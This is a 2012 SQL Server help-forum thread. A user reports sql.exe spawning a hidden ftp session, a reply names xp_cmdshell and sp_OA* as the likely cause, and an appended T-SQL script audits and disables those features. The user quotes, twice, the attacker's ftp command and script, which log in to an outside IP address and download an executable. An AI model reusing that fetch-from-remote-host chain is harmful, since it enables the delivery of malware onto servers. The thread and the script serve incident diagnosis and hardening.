Wednesday, March 28, 2012

malicious process...

Hi,
Since I installed a firewall on my machine, it regularly
detects unexpected ftp sessions.
Thanks to a process explorer, I remarked that ftp is
launched from a (hidden) cmd.exe, itself launched by
sql.exe (for your info, the ftp command line is : "ftp -n -s:?.txt"
where ?.txt is a textfile in \system32\ ).
What SQL subsystem is able to launch such a process? a
stored procedure? a trigger? (fyi, SQLAgent is not
running). How can I prevent this to occur?
Thank you for your help,
François
Note - contents of the textfile :

open 81.244.183.229 19470
user itqavjflw itqavjflw
get SCardClnt.exe
quit

Hi
xp_cmdshell or xp_oa* are capable of doing this.
Regards
--
Mike Epprecht, Microsoft SQL Server MVP
Zurich, Switzerland
MVP Program: http://www.microsoft.com/mvp
Blog: http://www.msmvps.com/epprecht/
"François G." wrote:

> Hi,
> Since I installed a firewall on my machine, it regularly
> detects unexpected ftp sessions.
> Thanks to a process explorer, I remarked that ftp is
> launched from a (hidden) cmd.exe, itself launched by
> sql.exe (for your info, the ftp command line is : "ftp -n -s:?.txt"
> where ?.txt is a textfile in \system32\ ).
> What SQL subsystem is able to launch such a process? a
> stored procedure? a trigger? (fyi, SQLAgent is not
> running). How can I prevent this to occur?
> Thank you for your help,
> François
>
> Note - contents of the textfile :
> open 81.244.183.229 19470
> user itqavjflw itqavjflw
> get SCardClnt.exe
> quit
>
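
An added example, not part of either post: a T-SQL audit of the two features named in the reply (xp_cmdshell and the sp_OA* OLE Automation procedures), followed by disabling them. It assumes SQL Server 2005 or later, where both are sp_configure options, and a login with sysadmin rights.

```sql
-- Added example. Assumes SQL Server 2005+ and a sysadmin login.
USE master;

-- 1. Are the features enabled? value_in_use = 1 means the feature is on.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures');

-- 2. Which principals hold an explicit permission on xp_cmdshell or on
--    any sp_OA* procedure? (class = 1 restricts to object-level grants.)
SELECT o.name  AS procedure_name,
       pr.name AS grantee,
       pe.state_desc,
       pe.permission_name
FROM sys.database_permissions AS pe
JOIN sys.all_objects AS o
  ON o.object_id = pe.major_id
JOIN sys.database_principals AS pr
  ON pr.principal_id = pe.grantee_principal_id
WHERE pe.class = 1
  AND (o.name = N'xp_cmdshell' OR o.name LIKE N'sp[_]OA%');

-- 3. sysadmin members can run both features without any grant and can
--    turn them back on, so review this list as well.
SELECT m.name AS sysadmin_member, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r
  ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m
  ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin';

-- 4. Disable both features, then hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Disabling the options does not stop a login that already has sysadmin rights from enabling them again, so the membership list from step 3 and the passwords of those logins need review too.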
